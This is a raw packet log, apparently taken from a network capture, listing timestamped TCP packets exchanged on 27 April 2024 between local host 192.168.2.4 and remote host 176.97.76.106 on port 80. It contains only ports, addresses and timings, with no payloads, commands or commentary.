Apr 27, 2024 01:31:17.032130003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032170057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032207966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032244921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032280922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032319069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032356024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032393932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032432079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032469034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032486916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032486916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032486916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032486916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032486916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032486916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032486916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032486916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032510996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032510996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032510996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032551050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032557011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032596111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032613039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032638073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032645941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032676935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032691956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032713890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032721043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032752037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032764912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032788992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032804966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032826900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032840967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032865047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032880068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032902956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032913923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032943010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032953978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.032983065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.032989979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033020973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033030033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033058882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033061981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033097029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033134937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033145905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033174038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033185959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033212900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033237934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033251047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033274889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033288956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033302069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033328056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033337116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033365011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033371925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033405066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033411026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033443928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033457994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033482075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033497095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033521891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033533096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033560038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033571959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033598900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033607006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033638000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033647060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033677101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033683062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033715963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033724070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033754110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033761978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033792973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033799887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033829927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033838987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033868074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033876896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033905983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033915043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033943892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033950090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.033982992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.033991098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034022093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034035921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034063101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034076929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034101963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034125090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034140110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034152985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034179926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034184933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034218073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034226894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034255981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034267902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034293890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034302950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034332037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034343004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034369946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034378052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034406900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034414053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034445047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034451962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034482956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034492016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034522057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034523964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034559011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034570932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034600973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034604073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034638882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034650087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034678936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034683943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034717083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034755945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034771919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034792900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034801006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034830093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034840107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034868956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034873962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034908056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034919977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034948111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.034961939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.034985065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.035022020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.035026073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.035058975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.035063028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.035098076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.035109043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.035137892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.035144091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.035176992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.035183907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.035214901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.035219908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.035254002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.035259962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.035291910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.035296917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.035331964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.222893000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.222953081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.222990990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223002911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223032951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223042011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223042011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223073006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223078966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223117113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223124981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223155975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223160028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223195076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223200083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223237038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223243952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223275900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223279953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223315001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223355055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223366022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223402977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223408937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223447084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223458052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223488092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223499060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223557949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223577976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223619938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223619938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223659039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223665953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223707914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223716021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223757029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223764896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223797083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223809004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223836899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223844051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223875999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223884106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223912001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223915100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223956108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.223957062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.223997116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224003077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224029064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224035025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224075079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224081039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224117994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224148989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224186897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224225998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224241018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224267006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224278927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224306107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224313974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224345922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224383116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224385977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224402905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224421024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224457026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224483013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224494934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224512100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224533081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224544048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224571943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224607944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224613905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224627018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224654913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224670887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224693060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224704981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224733114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224771976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224788904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224812984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224855900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224858999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224895000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.224901915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.224946022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.225590944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.225632906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.225646973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.225673914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.225687027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.225713968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.225720882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.225752115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.225760937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.225791931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.225805998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.225831032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.225836992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.225871086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.225878954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.225964069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.229810953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.229860067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.229897976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.229942083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.229980946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230015993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230021000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230070114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230093956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230098963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230139017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230148077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230180025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230186939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230227947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230236053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230274916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230283976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230314970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230341911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230353117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230360985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230392933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230397940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230432034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230444908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230472088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230484009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230511904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230519056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230551004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230557919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230592012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230604887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230633974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230640888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230673075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230694056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230711937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230731010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230752945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230757952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230792046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230807066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230830908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230832100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230869055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230885029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230909109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230916977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230947018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.230962038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.230988026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.231004000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.231026888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.231060028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.231065035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.231087923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.231103897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.231112003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:17.231143951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.231182098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:17.231195927 CEST	49734	80	192.168.2.4	176.97.76.106
